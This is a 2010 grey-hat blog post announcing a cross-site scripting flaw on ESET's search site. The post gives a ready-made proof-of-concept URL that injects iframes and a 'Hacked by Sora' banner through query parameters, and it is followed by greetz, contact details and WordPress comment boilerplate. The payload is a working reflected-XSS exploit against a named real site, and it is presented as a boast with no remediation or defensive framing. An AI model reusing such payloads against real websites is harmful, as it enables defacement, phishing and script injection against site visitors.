[whitepaper] ESET Cross Site Scripting Exploit

___________ _______________________________
\_   _____//   _____/\_   _____/\__    ___/
|    __)_ \_____  \  |    __)_   |    |
|        \/        \ |        \  |    |   http://www.eset.com/
|
/_______  /_______  //_______  /  |____|
\/        \/         \/   > Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://search.eset.com/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http;//search.eset.com/ suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victim’s PC.

————————-
3. PROOF OF CONCEPT     |
————————-
http://search.eset.com/esetsite/index?page=answers&type=%3Ciframe%20src=%22www.google.ca%22%3E&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail%20%5Bdot%5D%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox%5B%5D=en-US

Pretty much owned? >:D

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: